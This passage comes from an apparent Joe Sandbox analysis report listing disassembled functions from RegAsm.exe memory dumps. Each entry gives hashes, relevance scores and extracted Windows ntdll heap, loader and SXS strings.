                                                                                          • Opcode Fuzzy Hash: 72831af46333423396353486b35c214e2bc694ba0f70842caeeb0992dfa8db43
                                                                                          • Instruction Fuzzy Hash: 7CA1ABB59187069FD721CF25D480BAFB7E8BF88715F004D2EF5889A240D7B5D988CB92
                                                                                          Function 03209EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • minkernel\ntdll\sxsisol.cpp, xrefs: 03257713, 032578A4
                                                                                          • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03257709
                                                                                          • sxsisol_SearchActCtxForDllName, xrefs: 032576DD
                                                                                          • @, xrefs: 03209EE7
                                                                                          • Internal error check failed, xrefs: 03257718, 032578A9
                                                                                          • Status != STATUS_NOT_FOUND, xrefs: 0325789A
                                                                                          • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 032576EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                          • API String ID: 0-761764676
                                                                                          • Opcode ID: 968272bceb224dfd7061f243891af27c785da554abbffd5e7c24c5289182b52a
                                                                                          • Instruction ID: ebde5ba63f83c43303e53dbb0db5561d1b95dee1b3b7b318fbfcca319e8728a0
                                                                                          • Opcode Fuzzy Hash: 968272bceb224dfd7061f243891af27c785da554abbffd5e7c24c5289182b52a
                                                                                          • Instruction Fuzzy Hash: DE129075920229DFDB24DF58C881BBDB7B5FF08710F1880A9E845EB292E7749985CB60
                                                                                          Function 00402840 Relevance: 9.0, Strings: 7, Instructions: 208COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,$.T$VUUU$b$p$r3$r3p,
                                                                                          • API String ID: 0-3151747597
                                                                                          • Opcode ID: 34a5f3868a0ff9c73133a6ef79d270bc0141add52d59ef7db825844f05e5fc0a
                                                                                          • Instruction ID: a2748cd6465acfcfc7488fffe987b5ca80c0ce1305f38b5ab4c0d36c62f51f48
                                                                                          • Opcode Fuzzy Hash: 34a5f3868a0ff9c73133a6ef79d270bc0141add52d59ef7db825844f05e5fc0a
                                                                                          • Instruction Fuzzy Hash: 5F61F771B0010A8BDF1CCE59CA946BEB7A6EBD4305F58817EDC05AF3C5EA749E448B84
                                                                                          Function 031FEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                          • API String ID: 0-1109411897
                                                                                          • Opcode ID: ce8b7fcb970a6551415f3bfc2d6dc60c3525b44af9e7dfdaf5b1eb91eea0e411
                                                                                          • Instruction ID: 7f1e9b531aa63ae5b1a41185e05fe6813e1b3413fe1cd0190d6f9adf18eb8534
                                                                                          • Opcode Fuzzy Hash: ce8b7fcb970a6551415f3bfc2d6dc60c3525b44af9e7dfdaf5b1eb91eea0e411
                                                                                          • Instruction Fuzzy Hash: 2FA23974A1562A8FDB64DF19CC887A9F7B5AF49304F1442E9E90DA72A0DB709EC5CF00
                                                                                          Function 031EF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-523794902
                                                                                          • Opcode ID: 5859d2418a223d32bae2058390dd4581c1f09d54309acb590b30c46aa6918fee
                                                                                          • Instruction ID: 838c4779affba10fd03b525e46ed2965f87518a075f3b3e289c4ce5b2a7b47b1
                                                                                          • Opcode Fuzzy Hash: 5859d2418a223d32bae2058390dd4581c1f09d54309acb590b30c46aa6918fee
                                                                                          • Instruction Fuzzy Hash: D742F375218B829FD719DF28C484B2AFBE5FF88704F0A496DE8958B342D731D886CB51
                                                                                          Function 031FADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                          • API String ID: 0-4098886588
                                                                                          • Opcode ID: 8abbc5b97c050b0086733fd0058f0f8b31fc7396e015e68ddd81d2b89c7b7a3a
                                                                                          • Instruction ID: 22775198926c634737413964c04fbc9f2e882e8374929fd6f4966e63d130d37a
                                                                                          • Opcode Fuzzy Hash: 8abbc5b97c050b0086733fd0058f0f8b31fc7396e015e68ddd81d2b89c7b7a3a
                                                                                          • Instruction Fuzzy Hash: 6F32B175D082698FDB25CF14C894BEEB7B9AF48340F1881E9EA49AB250D7759FC18F40
                                                                                          Function 0320B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-122214566
                                                                                          • Opcode ID: e92955d9e073c0c4a9d2e067600aa313a4b689f324f12f0e7cd86ee948f74fe3
                                                                                          • Instruction ID: 74684f52459530e3ea9dffb986e331f26681cd7e419962c94d8f2d27cf9988dc
                                                                                          • Opcode Fuzzy Hash: e92955d9e073c0c4a9d2e067600aa313a4b689f324f12f0e7cd86ee948f74fe3
                                                                                          • Instruction Fuzzy Hash: A1C11671A30256ABDB34DB64C891BBEB7A5AF45700F184169ED06AF2C2D7F4C9C8C391
                                                                                          Function 032263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-792281065
                                                                                          • Opcode ID: 0f5f7fa38ffc146f430555c1e3b2000ea11a0ecfae8bb62246d9ad6c767ef0d7
                                                                                          • Instruction ID: 54c2fe31f88e4bf1dc6604eb7909283aa969f66bb93f39861b36d504c58ab21b
                                                                                          • Opcode Fuzzy Hash: 0f5f7fa38ffc146f430555c1e3b2000ea11a0ecfae8bb62246d9ad6c767ef0d7
                                                                                          • Instruction Fuzzy Hash: 4A913435A30326AFDB34EF55EC49BAEBBA4AF05B14F284158E5516F281D7F098C1C790
                                                                                          Function 0329F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                          • API String ID: 0-1745908468
                                                                                          • Opcode ID: 7b0ce62f9bc06abc04afa72ebc65eb08ce36bba25483bc3d7fbc689599440bf9
                                                                                          • Instruction ID: e833c142d1405ac92068a67c539f27226e6e2829ec56bb3dc387796e1b656588
                                                                                          • Opcode Fuzzy Hash: 7b0ce62f9bc06abc04afa72ebc65eb08ce36bba25483bc3d7fbc689599440bf9
                                                                                          • Instruction Fuzzy Hash: AD911E35A24742EFEF51DF68D540AADBBF2FF09701F18809EE455AB262CB719980CB50
                                                                                          Function 03222674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 03262160, 0326219A, 032621BA
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 03262165
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 032621BF
                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0326219F
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03262178
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03262180
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                          • API String ID: 0-861424205
                                                                                          • Opcode ID: fc087ee7423da8a4ad4ee163bcce0bc1e98989a09da0da4f7096d1f799453435
                                                                                          • Instruction ID: 268b97d4aef7826425ac83685800867c658f618f0c4db596cf23695374f6ff2d
                                                                                          • Opcode Fuzzy Hash: fc087ee7423da8a4ad4ee163bcce0bc1e98989a09da0da4f7096d1f799453435
                                                                                          • Instruction Fuzzy Hash: 2E312636F64325FBE720CE958C41F5EBA78DF55E51F090499BA147B142D3B0DAC0C2A0
                                                                                          Function 0322C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 032681E5
                                                                                          • LdrpInitializeImportRedirection, xrefs: 03268177, 032681EB
                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 03268170
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 03268181, 032681F5
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0322C6C3
                                                                                          • LdrpInitializeProcess, xrefs: 0322C6C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-475462383
                                                                                          • Opcode ID: 13bca45c83f64c83d0693e641e236c5798a84bf28d64561058b057914c554298
                                                                                          • Instruction ID: 95e013b50072de1444b0d292c251baedecf2b4b8b7db3796c0dc00e5819f664f
                                                                                          • Opcode Fuzzy Hash: 13bca45c83f64c83d0693e641e236c5798a84bf28d64561058b057914c554298
                                                                                          • Instruction Fuzzy Hash: AD310475664356AFC210EF28ED46E2AB7D4AF85B10F050958F9806F291D6A0EC84C7A2
                                                                                          Function 03279C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                          • API String ID: 0-3127649145
                                                                                          • Opcode ID: 444ef283af2fd6cabe8e8304820bd866a78ba7745d949fd0047afde8dab1455a
                                                                                          • Instruction ID: f2a9ad3f356f0ee7eb7226776d36a1d810079842c8720acf6d868a8a4014bc91
                                                                                          • Opcode Fuzzy Hash: 444ef283af2fd6cabe8e8304820bd866a78ba7745d949fd0047afde8dab1455a
                                                                                          • Instruction Fuzzy Hash: 58325974A1171A9BDB20DF25CC88B9AB7F8FF48314F1045EAD509AB250DB71AAC4CF40
                                                                                          Function 03209950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                          • API String ID: 0-3393094623
                                                                                          • Opcode ID: 304da36b572c97b674f0be765e5f2abdc9990e3fe4012a119021cd70c30956e1
                                                                                          • Instruction ID: 81a6d9d0f0dcbfa65aea4c7141eaee03b38036fe3c40f42ed1fc52bcf86fb6c9
                                                                                          • Opcode Fuzzy Hash: 304da36b572c97b674f0be765e5f2abdc9990e3fe4012a119021cd70c30956e1
                                                                                          • Instruction Fuzzy Hash: DC024D759283428FC720CF28C080B5BF7E5BF89714F44495EE99A972A2D770D9C8CB92
                                                                                          Function 032151EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Kernel-MUI-Language-SKU, xrefs: 0321542B
                                                                                          • WindowsExcludedProcs, xrefs: 0321522A
                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 0321527B
                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 03215352
                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 03215247
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                          • API String ID: 0-258546922
                                                                                          • Opcode ID: 570a8488cfa3705f2a687a01392ff1aad9294077f3548ea5e42b73323b1fee78
                                                                                          • Instruction ID: 11b64536b998d7590eb5980ea4de66293bab7574553ed35ff40663bdd36c0e98
                                                                                          • Opcode Fuzzy Hash: 570a8488cfa3705f2a687a01392ff1aad9294077f3548ea5e42b73323b1fee78
                                                                                          • Instruction Fuzzy Hash: 6FF15076D20619EFCB15DF94C9809EEB7F9FF59650F2500AAE501EB210D7B09E81CB90
                                                                                          Function 03274F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                          • API String ID: 0-2518169356
                                                                                          • Opcode ID: 5ef5ea4ce78a980d81d69fd709737844a2dfd50febe3641043e1812324ecb2df
                                                                                          • Instruction ID: c337eef469facbccf90a6f929aff0dcd07d9dd7c8b46a6203229d2d09c1624a5
                                                                                          • Opcode Fuzzy Hash: 5ef5ea4ce78a980d81d69fd709737844a2dfd50febe3641043e1812324ecb2df
                                                                                          • Instruction Fuzzy Hash: 4C91E272D2061A9BCB20CF69C880ABEF7B4FF4A710F294169E814EB350D775D981CB90
                                                                                          Function 0321D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1975516107
                                                                                          • Opcode ID: e65469e2bca21b5ae254a32aa39a658f6d8c96fd15d9894fa1d450327d47f8bd
                                                                                          • Instruction ID: aa603a96464468859b4685b704dc05c8137cd369b483437123ace3c95dd4db71
                                                                                          • Opcode Fuzzy Hash: e65469e2bca21b5ae254a32aa39a658f6d8c96fd15d9894fa1d450327d47f8bd
                                                                                          • Instruction Fuzzy Hash: A0513675A20346DFCB14DFA4E6857ADBBF1BF58304F288059D4106F295C7B0A8D6CB80
                                                                                          Function 031E76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                          • API String ID: 0-3061284088
                                                                                          • Opcode ID: c029753670008ee4aec1d402ceef88b3158e5b82cd3f2ac20411716254abaa97
                                                                                          • Instruction ID: ca5be14a83fb5ee7567ff3fd9854d416a17239151b1202fb27d8065ddc777cef
                                                                                          • Opcode Fuzzy Hash: c029753670008ee4aec1d402ceef88b3158e5b82cd3f2ac20411716254abaa97
                                                                                          • Instruction Fuzzy Hash: F9014C3616C791DFD22DE319E40EF66B7D4DB4AA31F19804EE0104F992CBE59CC0C660
                                                                                          Function 032070C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                          • API String ID: 0-3178619729
                                                                                          • Opcode ID: 25c95a35027b121ae32244b3adb43062f48ad4b4732389997653c96a503b87f7
                                                                                          • Instruction ID: 8ff611474427aa3a849190e8ef0fff4d5670e6e18957142540cd763d8db35cc9
                                                                                          • Opcode Fuzzy Hash: 25c95a35027b121ae32244b3adb43062f48ad4b4732389997653c96a503b87f7
                                                                                          • Instruction Fuzzy Hash: 5E13B374A20656DFDB24CF68C4807AAFBF1FF49304F188199D855AB382D774A989CF90
                                                                                          Function 03201070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-3570731704
                                                                                          • Opcode ID: 9df97dd029a34b83418dbc0c64dac8ae2a4f65575d9eb9421b5c7505c18eafd5
                                                                                          • Instruction ID: d224fdba0ee0ab7c53e76bd841bce04f4427d6153691c104a0efbff3778a5913
                                                                                          • Opcode Fuzzy Hash: 9df97dd029a34b83418dbc0c64dac8ae2a4f65575d9eb9421b5c7505c18eafd5
                                                                                          • Instruction Fuzzy Hash: E5927C75A20229CFEB24CB14CC84BA9B7B5BF45310F1981E9E949AB281D774AEC4CF51
                                                                                          Function 0320A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03257D03
                                                                                          • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03257D56
                                                                                          • SsHd, xrefs: 0320A885
                                                                                          • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03257D39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                          • API String ID: 0-2905229100
                                                                                          • Opcode ID: 431dcef89f57f1df86ef28873de1385a7467677437a5a7aa605c1559338f59e4
                                                                                          • Instruction ID: e528ac3ca0f2b46407d81ac40defc975e82acd379820cb26362e04698d16170c
                                                                                          • Opcode Fuzzy Hash: 431dcef89f57f1df86ef28873de1385a7467677437a5a7aa605c1559338f59e4
                                                                                          • Instruction Fuzzy Hash: 9CD19D75A2031A9FCB24CF98D9C06ADF7B5FF48310F59406AE845AB292D371E9C5CB90
                                                                                          Function 03203D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                          • API String ID: 0-3178619729
                                                                                          • Opcode ID: 185930654e03787e3fc4983163e338c9e024093edccae162f24485bc12454503
                                                                                          • Instruction ID: 6e6d8d866d64f47d200bd94ce1e8e66350cd368ef0da5c2ec1e8ddc3eef1a556
                                                                                          • Opcode Fuzzy Hash: 185930654e03787e3fc4983163e338c9e024093edccae162f24485bc12454503
                                                                                          • Instruction Fuzzy Hash: 78E2B174A202169FDB24DF69C490BA9FBF1FF49304F18C199D945AB386D770A889CF90
                                                                                          Function 031FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                          • API String ID: 0-379654539
                                                                                          • Opcode ID: 93f67d46e7aa5ab173731617dd4a7e7f756e359a2b5e365d666159dc8c4b3e4b
                                                                                          • Instruction ID: a4906ed5b77e005859d7f1122009c01bc691ff90b392e5d2024a2b52596c5743
                                                                                          • Opcode Fuzzy Hash: 93f67d46e7aa5ab173731617dd4a7e7f756e359a2b5e365d666159dc8c4b3e4b
                                                                                          • Instruction Fuzzy Hash: EDC19D74118782CFC715CF18C140B6AB7F4BF88704F098969FA998B291E779DA89CF52
                                                                                          Function 03200C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 032554D1, 03255592
                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 032554ED
                                                                                          • HEAP: , xrefs: 032554E0, 032555A1
                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 032555AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                          • API String ID: 0-1657114761
                                                                                          • Opcode ID: 6a88977d4a66d3f197b7b8bc36d88bb19a40d0b5a903fd5679e65cd39c224f94
                                                                                          • Instruction ID: 7dfc397158406cd5f167122b05ba1e517492cc790166ca098c685146af5c5c15
                                                                                          • Opcode Fuzzy Hash: 6a88977d4a66d3f197b7b8bc36d88bb19a40d0b5a903fd5679e65cd39c224f94
                                                                                          • Instruction Fuzzy Hash: C1A1E2346246469FE724DF64C880BBAF7F5EF45300F18C569E8968B682D770E988C7A1
                                                                                          Function 0322273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 032622B6
